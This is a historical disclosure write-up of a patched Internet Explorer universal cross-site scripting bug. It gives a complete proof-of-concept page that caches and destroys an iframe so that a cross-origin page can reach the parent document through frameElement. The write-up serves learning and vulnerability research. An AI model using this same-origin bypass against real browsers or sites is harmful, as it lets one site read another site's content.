UXSS - Cached contentWindow frameElement

Another entry in the frameElement UXSS collection, but this one uses pure HTML — no Flash, XAML, or XML. The trick is to cache an IFRAME’s contentWindow, then destroy the IFRAME with outerHTML, and then use the cached contentWindow to load a cross-origin page. That page gets a live frameElement pointing back to the parent document.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_CachedContentWindow_frameElement</title></head>
<body>
<font face="Tahoma" size="2">
<center><h1>xDom_CachedContentWindow_frameElement</h1></center>

<hr />
1) Cache the IFRAME Object (unused variable — just needs to be there):<br />
<font color="blue">unUsedCachedIframeObject</font> = document.all.<font color="blue">deadIframe</font>;<br /><br />

2) Cache the contentWindow:<br />
<font color="red">cachedContentWindow</font> = document.all.deadIframe.<font color="red">contentWindow</font>;<br /><br />

3) Kill the IFRAME with outerHTML:<br />
document.all.<font color="blue">deadIframe</font>.<b>outerHTML</b> = "RIP - A long time ago, there was an IFRAME here.";<br /><br />

4) Use cachedContentWindow to load a different-domain page:<br />
<font color="red">cachedContentWindow</font>.<b>name</b> = "<font color="green"><b>DEAD_IFRAME</b></font>";<br />
<font color="red">cachedContentWindow</font>.<b>open</b>("http://anydomain.com/anyfile.html", "<font color="green"><b>DEAD_IFRAME</b></font>");<br /><br />

5) That page can now read frameElement.<br /><br />
<hr />

<center>
<iframe id="deadIframe" src="" width="400" height="200"></iframe><br /><br />
</center>
</font>
<script language="JavaScript">
unUsedCachedIframeObject = document.all.deadIframe;
cachedContentWindow = document.all.deadIframe.contentWindow;
document.all.deadIframe.outerHTML = "RIP - A long time ago, there was an IFRAME here.";
cachedContentWindow.name = "DEAD_IFRAME";
cachedContentWindow.open("http://www.iframe.com/crash/20/I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html", "DEAD_IFRAME");
</script>
</body>
</html>

I_SHOUD_BE_IN_A_DIFFERENT_DOMAIN.html:

<script language="JavaScript">
alert(frameElement.ownerDocument.body.outerHTML);
</script>

The IFRAME is removed from the DOM with outerHTML, but the cached contentWindow keeps the navigation channel open. Loading a cross-origin page through that channel leaves the page’s frameElement pointing to what was the IFRAME’s slot in the parent document. IE also needs the unused unUsedCachedIframeObject variable to be set — without it, the technique doesn’t work, suggesting the IFRAME object itself also needs to be retained in memory.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.